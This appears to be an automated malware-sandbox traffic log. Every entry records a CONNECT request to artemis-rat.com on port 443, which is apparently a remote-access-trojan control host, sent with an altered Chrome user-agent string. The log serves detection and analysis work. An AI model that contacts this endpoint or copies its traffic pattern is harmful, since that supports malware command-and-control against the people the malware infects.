Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.com
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
